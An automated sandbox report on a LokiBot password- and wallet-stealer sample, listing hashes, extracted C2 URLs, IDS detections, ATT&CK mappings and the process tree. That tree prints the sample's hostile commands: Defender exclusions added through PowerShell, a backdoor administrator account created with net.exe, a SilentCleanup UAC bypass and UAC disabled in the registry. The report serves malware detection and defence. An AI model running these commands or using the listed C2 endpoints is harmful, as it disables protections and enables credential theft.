lokibot | 60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb

Analysis

max time kernel
108s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
21-05-2022 01:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
Size

583KB
MD5

6b69dad98e1d8005f36ab1119c305ab6
SHA1

9590a0c12559b6b7c14354d81e4230ed9f451ef5
SHA256

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb
SHA512

35ea539e2fc35abf2301372591902b43d4027196411f2d293f4f68db9e615f4d356025a76d5f28d1861d9d6752aa46505066e52c5352378644e14228cb250c4e

Score

10^/10

lokibot collection evasion persistence spyware stealer suricata trojan

Malware Config

Extracted

Family

lokibot

http://198.187.30.47/p.php?id=7347525472263042

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
suricata: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
suricata: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
suricata
suricata: ET MALWARE LokiBot Checkin
suricata: ET MALWARE LokiBot Checkin
suricata
suricata: ET MALWARE LokiBot Request for C2 Commands Detected M1
suricata: ET MALWARE LokiBot Request for C2 Commands Detected M1
suricata
suricata: ET MALWARE LokiBot User-Agent (Charon/Inferno)
suricata: ET MALWARE LokiBot User-Agent (Charon/Inferno)
suricata
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

Windows security modification 2 TTPs 5 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe = "0"	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Extensions\exe = "1"	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

cmdl32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	cmdl32.exe
Key opened	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	cmdl32.exe
Key opened	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	cmdl32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ROCKS = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe\""	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

description	pid	process	target process
PID 2204 set thread context of 4392	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	cmdl32.exe

Drops file in Windows directory 1 IoCs

Processes:

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

description	ioc	process
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\bd11dc1199333b7.raw	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
740	powershell.exe
740	powershell.exe
3744	powershell.exe
3744	powershell.exe
2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
3528	powershell.exe
3528	powershell.exe
4040	powershell.exe
4040	powershell.exe
3744	powershell.exe
3528	powershell.exe
4040	powershell.exe
2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

Suspicious behavior: RenamesItself 1 IoCs

Processes:

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

pid process

2204 60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exepowershell.exepowershell.exepowershell.exepowershell.execmdl32.exe

description	pid	process
Token: SeDebugPrivilege	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
Token: SeDebugPrivilege	740	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeDebugPrivilege	4040	powershell.exe
Token: SeDebugPrivilege	4392	cmdl32.exe

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 2204 wrote to memory of 740	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	powershell.exe
PID 2204 wrote to memory of 740	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	powershell.exe
PID 2204 wrote to memory of 740	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	powershell.exe
PID 2204 wrote to memory of 3152	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	net.exe
PID 2204 wrote to memory of 3152	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	net.exe
PID 2204 wrote to memory of 3152	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	net.exe
PID 3152 wrote to memory of 3536	3152	net.exe	net1.exe
PID 3152 wrote to memory of 3536	3152	net.exe	net1.exe
PID 3152 wrote to memory of 3536	3152	net.exe	net1.exe
PID 2204 wrote to memory of 3128	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	net.exe
PID 2204 wrote to memory of 3128	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	net.exe
PID 2204 wrote to memory of 3128	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	net.exe
PID 3128 wrote to memory of 2452	3128	net.exe	net1.exe
PID 3128 wrote to memory of 2452	3128	net.exe	net1.exe
PID 3128 wrote to memory of 2452	3128	net.exe	net1.exe
PID 2204 wrote to memory of 2236	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	net.exe
PID 2204 wrote to memory of 2236	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	net.exe
PID 2204 wrote to memory of 2236	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	net.exe
PID 2236 wrote to memory of 396	2236	net.exe	net1.exe
PID 2236 wrote to memory of 396	2236	net.exe	net1.exe
PID 2236 wrote to memory of 396	2236	net.exe	net1.exe
PID 2204 wrote to memory of 4784	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	net.exe
PID 2204 wrote to memory of 4784	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	net.exe
PID 2204 wrote to memory of 4784	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	net.exe
PID 4784 wrote to memory of 548	4784	net.exe	net1.exe
PID 4784 wrote to memory of 548	4784	net.exe	net1.exe
PID 4784 wrote to memory of 548	4784	net.exe	net1.exe
PID 2204 wrote to memory of 2780	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	schtasks.exe
PID 2204 wrote to memory of 2780	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	schtasks.exe
PID 2204 wrote to memory of 2780	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	schtasks.exe
PID 2204 wrote to memory of 3744	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	powershell.exe
PID 2204 wrote to memory of 3744	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	powershell.exe
PID 2204 wrote to memory of 3744	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	powershell.exe
PID 2204 wrote to memory of 3528	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	powershell.exe
PID 2204 wrote to memory of 3528	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	powershell.exe
PID 2204 wrote to memory of 3528	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	powershell.exe
PID 2204 wrote to memory of 4040	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	powershell.exe
PID 2204 wrote to memory of 4040	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	powershell.exe
PID 2204 wrote to memory of 4040	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	powershell.exe
PID 2204 wrote to memory of 4392	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	cmdl32.exe
PID 2204 wrote to memory of 4392	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	cmdl32.exe
PID 2204 wrote to memory of 4392	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	cmdl32.exe
PID 2204 wrote to memory of 4392	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	cmdl32.exe
PID 2204 wrote to memory of 4392	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	cmdl32.exe
PID 2204 wrote to memory of 4392	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	cmdl32.exe
PID 2204 wrote to memory of 4392	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	cmdl32.exe
PID 2204 wrote to memory of 4392	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	cmdl32.exe
PID 2204 wrote to memory of 4392	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	cmdl32.exe
PID 2204 wrote to memory of 4392	2204	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe	cmdl32.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

Processes:

60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe

outlook_office_path 1 IoCs

Processes:

cmdl32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	cmdl32.exe

outlook_win_path 1 IoCs

Processes:

cmdl32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	cmdl32.exe

C:\Users\Admin\AppData\Local\Temp\60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe
"C:\Users\Admin\AppData\Local\Temp\60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe"
1⤵
- Checks BIOS information in registry
- Checks computer location settings
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe" -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:740

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
2⤵
- Suspicious use of WriteProcessMemory
PID:3152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
3⤵
PID:3536

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
2⤵
- Suspicious use of WriteProcessMemory
PID:3128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
3⤵
PID:2452

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" localgroup users "Admin" /add
2⤵
- Suspicious use of WriteProcessMemory
PID:2236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup users "Admin" /add
3⤵
PID:396

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" localgroup administrators "Admin" /del
2⤵
- Suspicious use of WriteProcessMemory
PID:4784

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup administrators "Admin" /del
3⤵
PID:548

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
2⤵
PID:2780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe" -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\60233fbb1bbd1ce75f4d4a7852b473d4bdc2f489745069e0fcff434108586bbb.exe" -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4040

C:\Windows\SysWOW64\cmdl32.exe
"C:\Windows\SysWOW64\cmdl32.exe"
2⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4392

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
1333fa780f1c55444628b734a1eb3ed9

SHA1
790a6431bab77778990d64194f61d7b75446f698

SHA256
8c1b47f138577c656be55e330a06b87f0d35c549453a690cdd0aab683d45c2e3

SHA512
2c334f73d7869de88db7fe7da031d2593daae20b492156ac680d90d7fa0c3bdb7538fc34d4f51ea5b8c1f8fade066900c14a020ceeaf2090149825532fe3feef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
70f3f99a6aa1bea1ef2c951d2dfbe102

SHA1
41d7ecc52fe2768966b85fa113a7e4648dc2ca05

SHA256
39d552808a65797067b169dfd67eae9b5440b01523343b694456eb9b9311f12a

SHA512
30e162f7ce0a59dc8c81012164819182605070170b4ca5eb4b60617a68dfb99dbf538db64c0bff9622b8e03536f08b3c4b05680616a41d67254d1e7954018789

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2c454db0f56a300b1c0a03364d248ca0

SHA1
9f9fcd32375a46610288d58c36fccc85cfb86062

SHA256
77558df93bde63f1018c8b2946ea44167b38902492630a5ac564538ba7f6a1f3

SHA512
f64873309b04babe4fd05e58bff954d5a65ef26db96786d41f77a8700df040a65acfa1a6209cf80bf65790aacb56806ec358e3117054799594d81cdc6a0345f5

Download Submit
memory/396-148-0x0000000000000000-mapping.dmp

Download
memory/548-150-0x0000000000000000-mapping.dmp

Download
memory/740-164-0x0000000008080000-0x00000000086FA000-memory.dmp

Filesize
6.5MB

Download
memory/740-167-0x0000000007CC0000-0x0000000007D56000-memory.dmp

Filesize
600KB

Download
memory/740-138-0x0000000002E10000-0x0000000002E46000-memory.dmp

Filesize
216KB

Download
memory/740-139-0x0000000005950000-0x0000000005F78000-memory.dmp

Filesize
6.2MB

Download
memory/740-140-0x0000000005FE0000-0x0000000006002000-memory.dmp

Filesize
136KB

Download
memory/740-141-0x0000000006080000-0x00000000060E6000-memory.dmp

Filesize
408KB

Download
memory/740-165-0x0000000007A40000-0x0000000007A5A000-memory.dmp

Filesize
104KB

Download
memory/740-173-0x0000000007D60000-0x0000000007D68000-memory.dmp

Filesize
32KB

Download
memory/740-144-0x0000000006720000-0x000000000673E000-memory.dmp

Filesize
120KB

Download
memory/740-162-0x0000000006CE0000-0x0000000006CFE000-memory.dmp

Filesize
120KB

Download
memory/740-160-0x00000000076F0000-0x0000000007722000-memory.dmp

Filesize
200KB

Download
memory/740-161-0x000000006F0C0000-0x000000006F10C000-memory.dmp

Filesize
304KB

Download
memory/740-136-0x0000000000000000-mapping.dmp

Download
memory/740-166-0x0000000007AB0000-0x0000000007ABA000-memory.dmp

Filesize
40KB

Download
memory/740-170-0x0000000007C70000-0x0000000007C7E000-memory.dmp

Filesize
56KB

Download
memory/740-171-0x0000000007D80000-0x0000000007D9A000-memory.dmp

Filesize
104KB

Download
memory/2204-137-0x000000000B300000-0x000000000B366000-memory.dmp

Filesize
408KB

Download
memory/2204-133-0x0000000004E60000-0x0000000004E6A000-memory.dmp

Filesize
40KB

Download
memory/2204-134-0x0000000008AE0000-0x0000000008B56000-memory.dmp

Filesize
472KB

Download
memory/2204-152-0x000000000BBD0000-0x000000000BC6C000-memory.dmp

Filesize
624KB

Download
memory/2204-135-0x0000000008780000-0x000000000879E000-memory.dmp

Filesize
120KB

Download
memory/2204-132-0x0000000004DB0000-0x0000000004E42000-memory.dmp

Filesize
584KB

Download
memory/2204-131-0x00000000052C0000-0x0000000005864000-memory.dmp

Filesize
5.6MB

Download
memory/2204-130-0x0000000000290000-0x0000000000328000-memory.dmp

Filesize
608KB

Download
memory/2236-147-0x0000000000000000-mapping.dmp

Download
memory/2452-146-0x0000000000000000-mapping.dmp

Download
memory/2780-151-0x0000000000000000-mapping.dmp

Download
memory/3128-145-0x0000000000000000-mapping.dmp

Download
memory/3152-142-0x0000000000000000-mapping.dmp

Download
memory/3528-168-0x000000006F0C0000-0x000000006F10C000-memory.dmp

Filesize
304KB

Download
memory/3528-154-0x0000000000000000-mapping.dmp

Download
memory/3536-143-0x0000000000000000-mapping.dmp

Download
memory/3744-169-0x000000006F0C0000-0x000000006F10C000-memory.dmp

Filesize
304KB

Download
memory/3744-153-0x0000000000000000-mapping.dmp

Download
memory/4040-172-0x000000006F0C0000-0x000000006F10C000-memory.dmp

Filesize
304KB

Download
memory/4040-155-0x0000000000000000-mapping.dmp

Download
memory/4392-163-0x0000000000400000-0x00000000004A3000-memory.dmp

Filesize
652KB

Download
memory/4392-159-0x0000000000400000-0x00000000004A3000-memory.dmp

Filesize
652KB

Download
memory/4392-156-0x0000000000000000-mapping.dmp

Download
memory/4392-157-0x0000000000400000-0x00000000004A3000-memory.dmp

Filesize
652KB

Download
memory/4784-149-0x0000000000000000-mapping.dmp

Download